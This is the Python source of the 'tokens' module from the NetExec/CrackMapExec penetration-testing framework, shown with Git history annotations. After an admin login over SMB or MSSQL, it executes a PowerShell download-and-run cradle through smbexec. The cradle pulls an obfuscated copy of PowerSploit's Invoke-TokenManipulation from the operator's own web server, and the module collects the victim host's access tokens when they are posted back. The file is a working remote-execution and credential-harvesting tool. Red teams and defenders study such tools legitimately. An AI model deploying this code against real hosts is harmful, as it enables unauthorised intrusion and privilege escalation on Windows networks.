NetExec/cme/modules/tokens.py

102 lines
3.5 KiB
Python
Raw Normal View History

2017-03-27 21:09:36 +00:00
from cme.helpers.powershell import *
from datetime import datetime
from io import StringIO
2017-03-27 21:09:36 +00:00
import os
import sys
class CMEModule:
'''
Enumerates available tokens using Powersploit's Invoke-TokenManipulation
Module by @byt3bl33d3r
'''
name = 'tokens'
description = "Enumerates available tokens"
supported_protocols = ['mssql', 'smb']
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
'''
USER Search for the specified username in available tokens (default: None)
USERFILE File containing usernames to search for in available tokens (defult: None)
'''
self.user = None
self.userfile = None
if 'USER' in module_options and 'USERFILE' in module_options:
context.log.error('USER and USERFILE options are mutually exclusive!')
sys.exit(1)
if 'USER' in module_options:
self.user = module_options['USER']
elif 'USERFILE' in module_options:
path = os.path.expanduser(module_options['USERFILE'])
if not os.path.exists(path):
context.log.error('Path to USERFILE invalid!')
sys.exit(1)
self.userfile = path
self.ps_script = obfs_ps_script('powersploit/Exfiltration/Invoke-TokenManipulation.ps1')
def on_admin_login(self, context, connection):
command = "Invoke-TokenManipulation -Enumerate | Select-Object Domain, Username, ProcessId, IsElevated | Out-String"
2017-04-03 15:25:05 +00:00
launcher = gen_ps_iex_cradle(context, 'Invoke-TokenManipulation.ps1', command)
2017-03-27 21:09:36 +00:00
2017-10-25 06:45:58 +00:00
connection.ps_execute(launcher, methods=['smbexec'])
2017-03-27 21:09:36 +00:00
context.log.success('Executed payload')
def on_request(self, context, request):
if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script.encode())
2017-03-27 21:09:36 +00:00
else:
request.send_response(404)
request.end_headers()
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.get('content-length'))
data = response.rfile.read(length).decode()
2017-03-27 21:09:36 +00:00
#We've received the response, stop tracking this host
response.stop_tracking_host()
if len(data) > 0:
def print_post_data(data):
buf = StringIO(data.strip()).readlines()
for line in buf:
context.log.highlight(line.strip())
context.log.success('Enumerated available tokens')
if self.user:
if data.find(self.user) != -1:
context.log.success("Found token for user {}!".format(self.user))
print_post_data(data)
elif self.userfile:
with open(self.userfile, 'r') as userfile:
for user in userfile:
user = user.strip()
if data.find(user) != -1:
context.log.success("Found token for user {}!".format(user))
print_post_data(data)
break
else:
print_post_data(data)
log_name = 'Tokens-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(data, log_name)
context.log.info("Saved output to {}".format(log_name))